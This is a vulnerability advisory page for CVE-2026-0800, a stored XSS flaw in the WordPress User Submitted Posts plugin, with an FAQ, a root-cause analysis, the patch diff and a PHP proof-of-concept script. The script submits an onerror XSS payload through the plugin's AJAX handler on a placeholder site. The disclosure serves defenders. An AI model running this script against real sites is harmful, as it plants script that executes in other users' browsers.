What is CVE-2026-0800?

CVE-2026-0800 is a stored cross-site scripting (XSS) vulnerability found in the User Submitted Posts plugin for WordPress. It allows unauthenticated attackers to inject malicious scripts into posts via custom fields, which can execute when other users view the affected posts.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization in the plugin’s custom field processing. Attackers can submit a post with a crafted payload in a custom field, which is then stored and executed in the browser of any user accessing the compromised post.

Who is affected by this vulnerability?

Any WordPress site using the User Submitted Posts plugin version 20251210 or earlier is at risk. Site administrators should check their plugin version to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check for vulnerability, navigate to the plugins section of your WordPress admin dashboard. Look for the User Submitted Posts plugin and verify its version. If it is 20251210 or lower, your site is vulnerable.

How can I fix this issue?

The vulnerability is fixed in version 20260110 of the User Submitted Posts plugin. Update the plugin to this version or later to mitigate the risk of exploitation.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin until you can apply the patch. Additionally, restrict user permissions for post submissions to limit exposure to potential attacks.

What does a CVSS score of 7.2 mean?

A CVSS score of 7.2 indicates a high severity vulnerability. It suggests that successful exploitation could lead to significant impacts, such as unauthorized actions or data exposure, particularly affecting user trust and site integrity.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability could allow attackers to execute arbitrary JavaScript in the context of other users’ browsers. This can lead to session hijacking, unauthorized actions, or redirection to malicious sites, posing serious security risks.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can submit a post with a malicious payload via the plugin’s AJAX submission handler. It shows the exact payload that can be used to exploit the vulnerability, highlighting the ease of execution for an unauthenticated attacker.

What is the role of wp_kses_post() in the patch?

The function wp_kses_post() is used in the patched version of the plugin to sanitize user input before it is rendered in HTML. This function removes or encodes potentially dangerous HTML tags and attributes, preventing XSS attacks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0800: User Submitted Posts – Enable Users to Submit Posts from the Front End <= 20251210 – Unauthenticated Stored Cross-Site Scripting via Custom Field (user-submitted-posts)

CVE ID CVE-2026-0800

Plugin user-submitted-posts

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 20251210

Patched Version 20260110

Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0800:
The User Submitted Posts WordPress plugin, versions up to and including 20251210, contains an unauthenticated stored cross-site scripting (XSS) vulnerability. The flaw exists in the plugin’s custom field processing, allowing attackers to inject malicious scripts that execute when a user views a compromised post. The CVSS score of 7.2 reflects a high-severity impact due to the unauthenticated attack vector.

The root cause is insufficient output escaping for user-supplied data within the `usp_custom_field` function in `/user-submitted-posts/library/core-functions.php`. The function constructs markup for custom field display by directly inserting variables into a template string using `preg_replace`. Variables `$author`, `$label`, `$name`, `$value`, and `$title` (lines 272-276 and 323-327 in the vulnerable code) are not sanitized before being placed into the final HTML output. An attacker can submit a post with a malicious payload in a custom field value.

Exploitation occurs via the plugin’s front-end post submission form. An unauthenticated attacker submits a post containing a custom field with a crafted XSS payload, such as `alert(document.domain)`. The plugin stores this payload. When an administrator or any user views the submitted post in the WordPress dashboard or on the public site, the malicious script executes in their browser context. The attack vector is the custom field parameter submitted through the public-facing form.

The patch, implemented in version 20260110, applies the `wp_kses_post()` function to each variable before replacement in the markup template. This function sanitizes the variables for safe HTML output, stripping or encoding dangerous tags and attributes. The change occurs in two locations within the `usp_custom_field` function, ensuring both possible output paths are secured. The version numbers in the main plugin file are also updated accordingly.

Successful exploitation allows an unauthenticated attacker to inject arbitrary JavaScript into pages viewed by other users. This can lead to session hijacking, administrative actions performed on behalf of the victim, defacement, or redirection to malicious sites. The stored nature of the attack amplifies its impact, as the payload executes for every visitor to the compromised page.

Differential between vulnerable and patched code

Code Diff

--- a/user-submitted-posts/library/core-functions.php
+++ b/user-submitted-posts/library/core-functions.php
@@ -272,11 +272,11 @@
 			$patterns[4] = "/%%title%%/";

 			$replacements = array();
-			$replacements[0] = $author;
-			$replacements[1] = $label;
-			$replacements[2] = $name;
-			$replacements[3] = $value;
-			$replacements[4] = $title;
+			$replacements[0] = wp_kses_post($author);
+			$replacements[1] = wp_kses_post($label);
+			$replacements[2] = wp_kses_post($name);
+			$replacements[3] = wp_kses_post($value);
+			$replacements[4] = wp_kses_post($title);

 			$markup = preg_replace($patterns, $replacements, $markup);

@@ -323,11 +323,11 @@
 			$patterns[4] = "/%%title%%/";

 			$replacements = array();
-			$replacements[0] = $author;
-			$replacements[1] = $label;
-			$replacements[2] = $name;
-			$replacements[3] = $value;
-			$replacements[4] = $title;
+			$replacements[0] = wp_kses_post($author);
+			$replacements[1] = wp_kses_post($label);
+			$replacements[2] = wp_kses_post($name);
+			$replacements[3] = wp_kses_post($value);
+			$replacements[4] = wp_kses_post($title);

 			$markup = preg_replace($patterns, $replacements, $markup);

--- a/user-submitted-posts/user-submitted-posts.php
+++ b/user-submitted-posts/user-submitted-posts.php
@@ -10,8 +10,8 @@
 	Contributors: specialk
 	Requires at least: 4.7
 	Tested up to: 6.9
-	Stable tag: 20251210
-	Version:    20251210
+	Stable tag: 20260110
+	Version:    20260110
 	Requires PHP: 5.6.20
 	Text Domain: usp
 	Domain Path: /languages
@@ -38,7 +38,7 @@
 if (!defined('ABSPATH')) die();

 if (!defined('USP_WP_VERSION')) define('USP_WP_VERSION', '4.7');
-if (!defined('USP_VERSION'))    define('USP_VERSION', '20251210');
+if (!defined('USP_VERSION'))    define('USP_VERSION', '20260110');
 if (!defined('USP_PLUGIN'))     define('USP_PLUGIN', 'User Submitted Posts');
 if (!defined('USP_FILE'))       define('USP_FILE', plugin_basename(__FILE__));
 if (!defined('USP_PATH'))       define('USP_PATH', plugin_dir_path(__FILE__));

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0800 - User Submitted Posts – Enable Users to Submit Posts from the Front End <= 20251210 - Unauthenticated Stored Cross-Site Scripting via Custom Field

<?php
// Configure the target WordPress site URL
$target_url = 'http://vulnerable-site.example.com';

// Craft the POST request to the plugin's submission handler
$post_url = $target_url . '/wp-admin/admin-ajax.php';
$payload = array(
    'action' => 'usp_submit_post', // The plugin's AJAX action hook
    'usp-custom-field' => '<img src=x onerror=alert(document.domain)>', // XSS payload in a custom field
    'usp-title' => 'Atomic Edge Test Post',
    'usp-content' => 'This is a test post submission for vulnerability research.',
    // Additional required fields may be needed depending on plugin configuration
    // 'usp-name' => 'attacker',
    // 'usp-email' => 'attacker@example.com',
    // 'usp-submit' => 'Submit Post'
);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute the request to submit the malicious post
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check the response
if ($http_code == 200) {
    echo "Payload submitted. Check the submitted posts list or front-end for XSS execution.n";
    echo "Response snippet: " . substr($response, 0, 500) . "n";
} else {
    echo "Submission failed with HTTP code: $http_coden";
}
?>

Frequently Asked Questions

What is CVE-2026-0800?
Understanding the vulnerability
CVE-2026-0800 is a stored cross-site scripting (XSS) vulnerability found in the User Submitted Posts plugin for WordPress. It allows unauthenticated attackers to inject malicious scripts into posts via custom fields, which can execute when other users view the affected posts.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization in the plugin’s custom field processing. Attackers can submit a post with a crafted payload in a custom field, which is then stored and executed in the browser of any user accessing the compromised post.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the User Submitted Posts plugin version 20251210 or earlier is at risk. Site administrators should check their plugin version to determine if they are vulnerable.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, navigate to the plugins section of your WordPress admin dashboard. Look for the User Submitted Posts plugin and verify its version. If it is 20251210 or lower, your site is vulnerable.
How can I fix this issue?
Mitigation steps
The vulnerability is fixed in version 20260110 of the User Submitted Posts plugin. Update the plugin to this version or later to mitigate the risk of exploitation.
What if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the plugin until you can apply the patch. Additionally, restrict user permissions for post submissions to limit exposure to potential attacks.
What does a CVSS score of 7.2 mean?
Understanding severity ratings
A CVSS score of 7.2 indicates a high severity vulnerability. It suggests that successful exploitation could lead to significant impacts, such as unauthorized actions or data exposure, particularly affecting user trust and site integrity.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability could allow attackers to execute arbitrary JavaScript in the context of other users’ browsers. This can lead to session hijacking, unauthorized actions, or redirection to malicious sites, posing serious security risks.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept illustrates how an attacker can submit a post with a malicious payload via the plugin’s AJAX submission handler. It shows the exact payload that can be used to exploit the vulnerability, highlighting the ease of execution for an unauthenticated attacker.
What is the role of wp_kses_post() in the patch?
Understanding the fix
The function wp_kses_post() is used in the patched version of the plugin to sanitize user input before it is rendered in HTML. This function removes or encodes potentially dangerous HTML tags and attributes, preventing XSS attacks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations